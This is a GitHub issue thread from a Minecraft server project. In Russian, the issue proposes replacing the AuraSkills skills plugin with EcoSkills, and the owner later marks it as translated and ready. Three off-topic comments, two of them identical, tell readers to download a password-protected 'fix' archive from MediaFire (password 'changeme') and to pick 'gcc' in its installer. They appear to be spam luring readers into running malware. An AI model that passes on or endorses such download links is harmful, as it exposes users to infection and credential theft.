### ISSUE TITLE
[Нововведение] Изменить плагин AuraSkils на EcoSkills

### ISSUE THREAD

**Issue by DraimCiDo** [Server-Eclipse/Survival#10]
**Опишите что бы вы хотели добавить**
Изменение основного плагина на скиллы.

**Ссылка на плагин**
[Плагин](https://www.spigotmc.org/resources/ecoskills-%E2%AD%95-addictive-mmorpg-skills-%E2%9C%85-create-skills-stats-effects-mana-%E2%9C%A8-plug-play.95541/)

**Как вы бы хотели его видеть?**
Более продуманее, и красивым.

**Скриншоты**
![image](https://github.com/user-attachments/assets/b95cb25d-924f-416d-b50b-04c97a4bf0d1)

**Дополнительный контекст**
Данный плагин может предоставить больше контента и механик для режима.

**Comment by dseynhae** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by scppuna** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by DraimCiDo** [comment]
Относится к #36

**Comment by DraimCiDo** [comment]
- Плагин полностью переведён и готов.
